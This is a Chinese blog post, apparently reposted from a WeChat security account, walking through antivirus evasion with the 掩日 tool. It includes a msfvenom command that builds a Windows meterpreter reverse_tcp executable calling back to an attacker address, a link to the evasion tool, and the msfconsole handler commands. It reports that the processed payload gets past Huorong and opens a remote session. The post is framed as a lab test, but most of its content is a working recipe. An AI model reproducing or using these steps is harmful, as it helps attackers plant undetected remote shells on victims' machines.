掩日免杀笔记

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

 

 

1. 环境

攻击机: kali linux 10.211.55.23

受害机: Windows10 360主动防御

Windows7 火绒主动防御

 

2. 生成exe文件

在kali linux下使用msfvenom生成一个64位的exe文件

 

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe

 

 

将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软

使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)

 

下载地址:

https://github.com/1y0n/av_evasion_tool/

 

将文件直接拖过来就行了

 

 

最后会生成一个YR_1.exe文件

 

 

将这两个文件分别压缩备份,发送到window10和window7上

 

 

3. 静态测试

打开各自的杀软进行测试

3.1 360

 

均报毒

3.2 火绒

 

只有一个文件报毒

4. 上线测试

4.1 攻击机配置

 


msfconsole



use exploit/multi/handler

set LHOST 10.211.55.23

set LPORT 4444

set payload windows/x64/meterpreter/reverse_tcp

exploit

 

 

4.2 360下

4.2.1 1..exe

直接gg

 

4.2.2 免杀版1.exe

直接gg

4.3 火绒

4.3.1. 1.exe

gg

4.3.2 免杀版1.exe

上线正常

执行命令

5. 总结

总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!👍

  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值